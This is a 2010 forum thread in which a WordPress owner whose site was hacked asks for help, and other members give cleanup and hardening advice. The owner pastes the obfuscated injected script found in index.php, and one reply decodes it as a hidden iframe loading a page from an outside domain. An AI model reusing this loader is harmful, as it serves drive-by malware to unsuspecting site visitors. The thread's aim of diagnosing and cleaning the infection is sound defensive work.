1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

hacked ?

Discussion in 'PHP & Perl' started by maildigger, Jan 13, 2010.

  1. maildigger

    maildigger Power Member

    Joined:
    Jan 30, 2009
    Messages:
    558
    Likes Received:
    60
    Location:
    EU
    I get a malware warning If I use Google chrome on one of my websites. I checked FTP and saw there where many suspious files that shouldn't be there (it's a wordpress install) in the public html folder. I deleted al the files and changed the pasword of the FTP. Will this solve the problem? How does the Google warning go away?

    I also checked my index.php file and found additional code at the bottom:
    What is that?

    <script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script><script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>
     
  2. Kaimi

    Kaimi Newbie

    Joined:
    Dec 6, 2009
    Messages:
    35
    Likes Received:
    230
    Home Page:
    It is encoded iframe
    Code:
    fr=document.createElement('iframe');
    fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
    fr.style.display="none";
    document.getElementsByTagName('body')[0].appendChild(fr);
    
     
    • Thanks Thanks x 1
  3. maildigger

    maildigger Power Member

    Joined:
    Jan 30, 2009
    Messages:
    558
    Likes Received:
    60
    Location:
    EU
    What does that mean? How can I solve this problem?
     
  4. trophaeum

    trophaeum Senior Member

    Joined:
    Dec 21, 2007
    Messages:
    1,189
    Likes Received:
    706
    remove the javascript from ur sites
    upgrade your scripts (most likely old wordpress)
    get and run a good antivirus app with firewall (kaspersky internet security HIGHLY recommended)

    have fun, u just got pwn3d
     
    • Thanks Thanks x 1
  5. maildigger

    maildigger Power Member

    Joined:
    Jan 30, 2009
    Messages:
    558
    Likes Received:
    60
    Location:
    EU
    OK ... how can I remove the javascript from wordpress?
     
  6. maildigger

    maildigger Power Member

    Joined:
    Jan 30, 2009
    Messages:
    558
    Likes Received:
    60
    Location:
    EU
    If I look at the pagesource, there is a iframe at the bottom which is causing the problem, but I can't find it to delete it!
     
  7. trophaeum

    trophaeum Senior Member

    Joined:
    Dec 21, 2007
    Messages:
    1,189
    Likes Received:
    706
    check all index.php files on your server, thats probably whats been edited, if not look through header.php and footer.php files
     
    • Thanks Thanks x 1
  8. Hijinx

    Hijinx Junior Member

    Joined:
    Apr 13, 2009
    Messages:
    142
    Likes Received:
    87
    Location:
    New Jersey
    I second this... change your control panel account password, FTP etc... re-install latest, make sure your directory permissions are correct... you need to look at ALL your sites on that server not just the one that has been hacked... remove all scripts your not using... if you have backups old ones use them instead of the current DB that might contain code ...

    Bottom line is you have to assume that everything has been compromised and work your way up from there... not just index files suspect ALL files
     
    • Thanks Thanks x 1
    Last edited: Jan 13, 2010
  9. maildigger

    maildigger Power Member

    Joined:
    Jan 30, 2009
    Messages:
    558
    Likes Received:
    60
    Location:
    EU
    I updated all wordpress versions to 2.9.1
    I deleted all suspious files
    I deleted / edited all index.php files

    Seems that everything is ok for now! Thanks for the help everyone!

    PS what directory permissions should I give?
     
  10. Hijinx

    Hijinx Junior Member

    Joined:
    Apr 13, 2009
    Messages:
    142
    Likes Received:
    87
    Location:
    New Jersey
    For WP you might want to look at some of these plugins...

    Code:
    http://wordpress.org/extend/plugins/wp-security-scan/
    http://wordpress.org/extend/plugins/paranoid911/
    
    Security advice (as per WP)

    Code:
    http://codex.wordpress.org/Hardening_WordPress
    Regards...
     
  11. Method

    Method Registered Member

    Joined:
    Jan 30, 2010
    Messages:
    90
    Likes Received:
    12
    Occupation:
    Spacebean
    At least try running a rootkit hunter on the server after changing your password (rkhunter is my preference).. Sorry just realised this old thread.
     
    Last edited: Feb 8, 2010
  12. showboytridin

    showboytridin Regular Member

    Joined:
    Sep 5, 2009
    Messages:
    348
    Likes Received:
    714
    Location:
    127.0.0.1
    Backup all your posts get a fresh instalation and use a clean design. Then you can import your posts. And use the last wp version.
    Posted via Mobile Device